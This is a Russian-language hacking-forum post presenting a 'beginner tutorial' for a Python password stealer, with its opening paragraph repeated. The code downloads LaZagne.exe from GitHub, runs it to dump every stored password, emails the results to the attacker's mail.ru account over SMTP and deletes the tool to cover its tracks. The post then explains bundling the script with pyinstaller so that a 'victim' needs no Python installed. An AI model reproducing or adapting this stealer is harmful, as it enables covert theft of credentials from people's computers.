Twink-Nickos
Участник
- Статус
- offline
- Регистрация
- 19.01.2020
- Сообщения
- 65
- Репутация
- 16
Приветствую всех форумчан!
Решил сегодня показать простую реализацию стиллера на Python'е с помощью вceизвecтного стиллера паролей - LaZagne.
( Подробнее: https://github.com/AlessandroZ/LaZagne)
Это моя первая обучающая тема, просьба не критиковать. Если будет отдача и вам зайдёт, то буду готовить ещё много интересного на Питоне.
Итак, приступим...
( Код не сложный, постараюсь максимально понятно объяснить каждую строку )
Решил сегодня показать простую реализацию стиллера на Python'е с помощью вceизвecтного стиллера паролей - LaZagne.
( Подробнее: https://github.com/AlessandroZ/LaZagne)
Это моя первая обучающая тема, просьба не критиковать. Если будет отдача и вам зайдёт, то буду готовить ещё много интересного на Питоне.
Итак, приступим...
( Код не сложный, постараюсь максимально понятно объяснить каждую строку )
Python:
import subprocess # выполнение команд в шелле
import smtplib # работа с почтой
import requests # работа с http запросами
import tempfile # работа с временными файлами ( Нужна, чтобы направить lazagne.exe в правильное место )
import os # работа с ОС
def get_file(url): # создадим функцию, которая получит конечный файл с LaZagne.exe
r = requests.get(url) # создадим запрос
file_name = url.split('/')[-1] # отсекаем http://github.com/..... и в итоге получаем конечное название файла - lazagne.exe
with open(file_name, 'wb') as file: # открываем файл в локальной переменной file
file.write(r.content) # пишем содержимое в файл
def send(email, password, message): # создадим функцию, которая будет отправлять логи
server = smtplib.SMTP('smtp.mail.ru', 587) # подключимся к smtp майла ( можно и smtp.gmail.com ) через порт 587
server.starttls() # стартуем соединение с шифрованием tls
server.login(email, password) # логинимся в майл
server.sendmail(email, email, message) # отправляем письмо
server.quit() # закрываем сессию
temp_dir = tempfile.gettempdir() # передадим в эту переменную путь к tmp ( временным файлам, где и хранятся пароли )
os.chdir(temp_dir) # сменим директорию в наши временные файлы
get_file('https://github.com/AlessandroZ/LaZagne/releases/download/2.4.3/lazagne.exe') # скачаем файл lazagne.exe по правилам в нашей функции
result = subprocess.check_output('lazagne.exe all', shell=True) # передадим в эту переменную команду запуска lazagne.exe ( ключ 'all' извлекает абсолютно все пароли в системе, атрибут shell=True предоставляет доступ к шеллу )
send('ваш_майл@mail.ru', 'ваш пароль', result) # отправляем логи
os.remove('lazagne.exe') # удалям наш файл ( заметаем следы )В дальнейшем, можно конвертировать наш стиллер с .exe с помощью библеотеки pyinstaller ( https://pypi.org/project/PyInstaller/ ).
Просто в командной строке ( в windows системе ) пишем pyinstaller -F наш_стиллер.py . Жертве даже не придётся устанавливать интерпретатор Пайтона и библеотеки.
Последнее редактирование:
